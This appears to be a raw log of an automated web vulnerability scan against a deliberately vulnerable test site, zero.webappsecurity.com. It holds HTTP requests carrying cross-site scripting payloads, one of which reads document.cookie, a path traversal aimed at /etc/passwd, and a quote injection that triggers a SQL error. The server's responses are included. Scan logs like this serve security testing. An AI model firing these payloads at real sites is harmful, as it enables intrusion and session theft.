10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=--><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 186
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was --><script>alert('XSS')</script>
</body>
</html>
GET /cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:43:19 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:01 GMT
ETag: "ac14c2f8a9dc11:8f6"
Content-Length: 18
bleh exploit :0:0:GET /forgot1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Location: forgot2.asp?msg2=no&msg=We+could+not+find+your+e-mail+address+in+our+database.+Please+join+below.
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /plink.asp?a=--><script>alert('XSS')</script>&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 198
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = --><script>alert('XSS')</script></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=>"><script>alert('XSS')</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=>"'><img%20src="javascript:alert('XSS')">&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:36 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=>"><script>alert('XSS')</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=test@<script>alert(document.cookie)</script>.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:40 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 3998
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>test@<script>alert(document.cookie)</script>.com</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /scripts/weblog HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:30:18 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:16 GMT
ETag: "b4fe491aadc11:8f6"
Content-Length: 25
blehblehblbhelbhlebghlebhGET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:32 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /forgot2.asp?msg2=no&msg=We%2Bcould%2Bnot%2Bfind%2Byour%2Be%2Dmail%2Baddress%2Bin%2Bour%2Bdatabase.%2BPlease%2Bjoin%2Bbelow. HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1887
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">We+could+not+find+your+e-mail+address+in+our+database.+Please+join+below.</td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
GET /forgot1.asp?get=\' HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 361
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '[user] = '\'''.</font>
<p>
<font face="Arial" size=2>/forgot1.asp</font><font face="Arial" size=2>, line 8</font> GET /linking/link1/link2/link3/link4/link5/link6/link7/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
